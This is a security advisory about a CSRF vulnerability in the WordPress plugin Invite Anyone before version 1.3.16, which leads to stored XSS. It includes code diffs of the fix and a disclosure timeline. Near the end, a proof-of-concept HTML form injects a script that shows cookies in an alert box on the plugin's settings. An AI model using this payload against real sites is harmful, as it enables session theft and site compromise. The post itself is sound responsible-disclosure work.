Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Invite Anyone
At the beginning of the year we took a couple of actions to improve our inclusion of vulnerabilities where there has not been a report on the vulnerability released by the discoverer so that we could expand the number of vulnerabilities we include in our dataset. First, we expanded our monitoring of changes made to plugins to spot more of those situations. Second, we started releasing posts with the details of those vulnerabilities, which allows us to provide more information on the vulnerabilities to our customers than we otherwise could. That has also led to us spotting additional vulnerabilities in those plugins, just as we have when reviewing reports for other vulnerabilities.
While putting together a post on a vulnerability that had existed in the plugin Invite Anyone we then spotted another vulnerability, which in part involved a lack of protection against cross-site request forgery (CSRF). After noticing that we did some more checking and found that there was also CSRF vulnerability when saving the plugin’s settings page, which could be used to cause cross-site scripting (XSS) due to a lack of sanitation when doing that. We notified the developer of those issues and they quickly got back to us and have now released version 1.3.16, which resolves the vulnerability.
Prior to 1.3.16 the plugin’s setting pages included a nonce, which is used to prevent CSRF, but when the settings are saved there was no check to make sure a valid one was included. That occurred in the function invite_anyone_admin_panel in the files /admin/admin-panel.php.
In version 1.3.15 the code for saving starts running right after a check to see if a request to save the settings is sent:
36 37 | if ( !empty( $_POST['invite-anyone-settings-submit'] ) ) { $options = invite_anyone_options(); |
In 1.3.16 the function check_admin_referer() is run to check if a valid nonce is included in the request before moving on:
36 37 38 39 | if ( !empty( $_POST['invite-anyone-settings-submit'] ) ) { check_admin_referer( 'invite_anyone-options' ); $options = invite_anyone_options(); |
Also as of 1.3.15 the function used to sanitize the settings when they were passed through the function register_setting() didn’t so any sanitization:
636 637 638 | function invite_anyone_settings_check($input) { return $input; } |
In 1.3.16 that function includes relevant sanitization for each of the settings.
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the Send Invites Tab of a user BuddyPress Profile page, when submitted as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=invite-anyone" method="POST"> <input type="hidden" name="invite_anyone[default_invitation_subject]" value="<script>alert(document.cookie);</script>"> <input type="submit" name="invite-anyone-settings-submit" value="Save Changes" /> </form> </body> </html>
Timeline
- March 20, 2017 – Developer notified.
- March 20, 2017 – Developer responds.
- March 22, 2017 – Version 1.3.16 released, which fixes vulnerability.